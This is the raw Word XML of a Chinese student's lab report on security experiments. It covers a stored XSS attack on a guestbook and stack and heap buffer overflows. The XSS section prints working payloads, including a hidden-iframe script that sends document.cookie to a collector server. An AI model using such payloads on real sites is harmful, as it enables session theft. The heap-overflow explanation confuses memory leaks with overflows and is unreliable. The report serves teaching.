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6"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验1-1：跨站</w:t>
      </w:r>
      <w:r>
        <w:t>脚本攻击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Style w:val="6"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>启动并访问留言系统</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:leftChars="0"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成功进入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:leftChars="0"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4799965" cy="1914525"/>
            <wp:effectExtent l="0" t="0" r="635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200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:leftChars="0"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添加留言</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:leftChars="0"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3799840" cy="2428875"/>
            <wp:effectExtent l="0" t="0" r="635" b="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200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:leftChars="0"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管理留言</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:leftChars="0"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4752340" cy="1419225"/>
            <wp:effectExtent l="0" t="0" r="635" b="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200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pP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Style w:val="6"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2.存储式跨站脚本漏洞检测</w:t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按照要求输入代码，可以看到刷新后出现了这条提示。</w:t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276850" cy="1563370"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255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留言如下，可以看到并没有内容，是因为我们输入的这一串字符串，被浏览器当做了hdmi代码被执行了，这就是X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>SS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>攻击的基本原理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5038090" cy="2343150"/>
            <wp:effectExtent l="0" t="0" r="635" b="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故而其他用户进入这个网页也会弹出，因为这段代码被写入了数据库，其他用户访问时，这段代码被取出并被执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.利用存储式跨站漏洞窃取用户cookie</w:t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1.可以看到该页面被嵌入了留言中</w:t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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4895215" cy="2400300"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="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2.将网页的宽度和高度设置成0之后，可以看到在留言中就被隐藏了。</w:t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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5057140" cy="3104515"/>
            <wp:effectExtent l="0" t="0" r="635" b="635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3.添加&lt;script&gt;document.write(document.cookie)&lt;/script&gt;后，得到cookie：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4780915" cy="1085850"/>
            <wp:effectExtent l="0" t="0" r="635" b="0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4.添加&lt;script&gt;alert(document.cookie)&lt;/script&gt;后，信息直接被弹出</w:t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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3421380" cy="3146425"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6350"/>
            <wp:docPr id="1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5.使用管理员模式登陆，可以看到用户名和密码都被窃取了：</w:t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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5278120" cy="1802765"/>
            <wp:effectExtent l="0" t="0" r="8255" b="6985"/>
            <wp:docPr id="2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6.启用ASP，添加index.asp,给予写入权限</w:t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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4209415" cy="65722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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2856865" cy="1190625"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="2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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3656965" cy="2514600"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="2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7.访问web服务界面：</w:t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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5281295" cy="502920"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1905"/>
            <wp:docPr id="3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t>8.添加&lt;script&gt;document.write("&lt;iframe width=0 height=0 src='http://10.1.1.78/cookie.asp?cookie="+document.cookie+"'&gt;&lt;/iframe&gt;");&lt;/script&gt;后，已经于此接收到了cookie信息。</w:t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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3030855" cy="1644650"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3175"/>
            <wp:docPr id="3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480" w:firstLineChars="200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这里可以看到我有些记录是空的，因为我在写代码的时候有错误。在asp?cookie这一句中由于浏览器的换行，我以为?之后会有一个空格，导致初次尝试的代码错误，经过仔细对比后发现其实没有空格，修改后成功获得cookie值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5277485" cy="1158240"/>
            <wp:effectExtent l="0" t="0" r="889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实验1-2：</w:t>
      </w:r>
      <w:r>
        <w:t>栈和堆的溢出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.分析缓冲区</w:t>
      </w:r>
      <w:r>
        <w:t>溢出的原理。根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验指导书</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2个</w:t>
      </w:r>
      <w:r>
        <w:t>程序，详细</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明</w:t>
      </w:r>
      <w:r>
        <w:t>基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆</w:t>
      </w:r>
      <w:r>
        <w:t>和栈的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓冲区</w:t>
      </w:r>
      <w:r>
        <w:t>溢出的原理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓冲区</w:t>
      </w:r>
      <w:r>
        <w:t>溢出的原理：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在计算机内部，输入数据通常被存放在一个临时空间内，这个临时存放的空间就被称为缓冲区，缓冲区的长度事先已经被程序或者操作系统定义好了。向缓冲区内填充数据，如果数据的长度很长，超过了缓冲区本身的容量，那么数据就会溢出存储空间，而这些溢出的数据还会覆盖在合法的数据上，就出现了缓冲区溢出。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈溢出</w:t>
      </w:r>
      <w:r>
        <w:t>的原理：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在大缓冲区的数据向小缓冲区复制的过程中，由于没注意小缓冲区的边界，“撑爆”了较小的缓冲区，从而冲掉了和小缓冲区相邻内存区域的其他数据而引起的内存问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在第1个</w:t>
      </w:r>
      <w:r>
        <w:t>程序中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的fun()函数</w:t>
      </w:r>
      <w:r>
        <w:t>中，当使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>strcpy()将字符数组s的</w:t>
      </w:r>
      <w:r>
        <w:t>内容复制到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buf中</w:t>
      </w:r>
      <w:r>
        <w:t>时，因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buf的</w:t>
      </w:r>
      <w:r>
        <w:t>总长度小于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s的</w:t>
      </w:r>
      <w:r>
        <w:t>长度，所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>产生</w:t>
      </w:r>
      <w:r>
        <w:t>了溢出，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s字符串</w:t>
      </w:r>
      <w:r>
        <w:t>后面的内容，即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>haha()函数</w:t>
      </w:r>
      <w:r>
        <w:t>的地址覆盖掉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:r>
        <w:t>内存中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buf数组</w:t>
      </w:r>
      <w:r>
        <w:t>所在位置的后面的数据，所以之后执行了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>haha()函数</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆溢出</w:t>
      </w:r>
      <w:r>
        <w:t>的原理：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>从堆中分配的内存需要程序员手动释放，如果不释放，而系统内存管理器又不自动回收这些堆内存的话</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那就一直被占用。如果一直申请堆内存，而不释放，内存会越来越少，很明显的结果是系统变慢或者申请不到新的堆内存，</w:t>
      </w:r>
      <w:r>
        <w:t>所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新</w:t>
      </w:r>
      <w:r>
        <w:t>写入的数据会覆盖住原来的数据，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即</w:t>
      </w:r>
      <w:r>
        <w:t>堆溢出。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2个</w:t>
      </w:r>
      <w:r>
        <w:t>程序中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输入的字符串</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大小</w:t>
      </w:r>
      <w:r>
        <w:t>大于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>申请</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存</w:t>
      </w:r>
      <w:r>
        <w:t>大小</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>所以它会覆盖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>output的</w:t>
      </w:r>
      <w:r>
        <w:t>内存区域，所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出的</w:t>
      </w:r>
      <w:r>
        <w:t>output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不是</w:t>
      </w:r>
      <w:r>
        <w:t>“normal output”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而是输入</w:t>
      </w:r>
      <w:r>
        <w:t>的字符串中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>溢出</w:t>
      </w:r>
      <w:r>
        <w:t>的部分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2.实验结果</w:t>
      </w:r>
      <w:r>
        <w:t>截图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈溢出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32400" cy="1551305"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1270"/>
            <wp:docPr id="1" name="图片 1" descr="IMG_20201018_104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1018_104117"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:srcRect t="18155" b="4231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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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堆</w:t>
      </w:r>
      <w:r>
        <w:t>溢出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing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32400" cy="2912110"/>
            <wp:effectExtent l="0" t="0" r="6350" b="2540"/>
            <wp:docPr id="2" name="图片 2" descr="IMG_20201018_11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1018_110458"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:srcRect t="10243" b="1555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C4CBA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="081C4C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D14BA"/>
    <w:rsid w:val="01BD14BA"/>
    <w:rsid w:val="04B1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2020-10-20T05:04:00Z</dcterms:created>
  <dc:creator>ttn91</dc:creator>
  <cp:lastModifiedBy>ttn91</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-24T10:45:32Z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